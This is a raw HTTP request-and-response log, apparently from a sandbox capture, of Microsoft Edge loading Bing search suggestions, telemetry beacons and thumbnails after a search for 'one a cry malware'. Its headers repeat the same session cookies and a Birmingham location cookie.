cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 7202
date: Thu, 17 Oct 2024 21:04:09 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199049.1491a404
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=one&cp=3&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /AS/Suggestions?pt=page.serp&bq=one+a+cry+malware&mkt=en-gb&qry=one&cp=3&csr=1&msbqf=false&pths=1&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
x-autosuggest-contentwidth: 650
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

content-length: 1114
content-type: application/json; charset=utf-8
cache-control: private, max-age=300
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 67117bc9dc2e48ebaa40ffd669a868b4
x-as-setsessionmarket: en-gb
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-7ZKfUOO7kK26eBl/qArmq5ciptURZqYCWWU7MTg7VX4='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 17 Oct 2024 21:04:09 GMT
set-cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb; domain=.bing.com; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199049.1491a402
GET

https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Aone%20a%2Ci%3A12%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199049055%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20c%2Ci%3A10%22%2C%22AsResponseLength%22%3A%22539%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199049056%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20%2Ci%3A10%2Cig%3A19CB8ED77CA34035B388DB94E13CA8A7%22%2C%22AnswerInfo%22%3A%22HS%3B17%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199049057%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20%2Ci%3A13%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199049085%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20%2Ci%3A11%22%2C%22AsResponseLength%22%3A%22517%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199049087%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20%2Ci%3A11%2Cig%3ABDB9300608914F7CA526382C16425617%22%2C%22AnswerInfo%22%3A%22HS%3B17%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199049088%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20%2Ci%3A12%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199049125%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%2Ci%3A14%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199049174%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%2Ci%3A13%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199049197%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20%2Ci%3A12%22%2C%22AsResponseLength%22%3A%221052%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199049216%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Aone%20a%2Ci%3A12%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199049055%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20c%2Ci%3A10%22%2C%22AsResponseLength%22%3A%22539%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199049056%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20%2Ci%3A10%2Cig%3A19CB8ED77CA34035B388DB94E13CA8A7%22%2C%22AnswerInfo%22%3A%22HS%3B17%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199049057%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20%2Ci%3A13%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199049085%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20%2Ci%3A11%22%2C%22AsResponseLength%22%3A%22517%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199049087%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20a%20%2Ci%3A11%2Cig%3ABDB9300608914F7CA526382C16425617%22%2C%22AnswerInfo%22%3A%22HS%3B17%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1729199049088%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20%2Ci%3A12%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199049125%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%2Ci%3A14%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199049174%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%2Ci%3A13%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1729199049197%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aone%20%2Ci%3A12%22%2C%22AsResponseLength%22%3A%221052%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1729199049216%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2095
date: Thu, 17 Oct 2024 21:04:09 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199049.1491a513
GET

https://www.bing.com/th?id=OSK.dc5e1b6c5a033b489e26db65da126925&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /th?id=OSK.dc5e1b6c5a033b489e26db65da126925&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

content-length: 1363
content-type: application/json; charset=utf-8
cache-control: private, max-age=300
content-encoding: gzip
vary: Accept-Encoding
x-eventid: 67117bca46964863ad964e52bdb2e83d
x-as-setsessionmarket: en-gb
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-zJtUuQrXoYf9b5IUr+yoVnYjn87eTK4PncqbbCJaDYk='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 17 Oct 2024 21:04:10 GMT
set-cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb; domain=.bing.com; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199050.1491a581
GET

https://www.bing.com/th?id=OSK.65b5a5e20a74e7caf1feae4a1b2e8d68&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /th?id=OSK.65b5a5e20a74e7caf1feae4a1b2e8d68&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 5583
date: Thu, 17 Oct 2024 21:04:10 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199050.1491a661
GET

https://www.bing.com/th?id=OSK.HEROe8EUEk-kiNkU_06qkmAc8E8JKLhUhsKgGGjVju-zv_g&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /th?id=OSK.HEROe8EUEk-kiNkU_06qkmAc8E8JKLhUhsKgGGjVju-zv_g&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
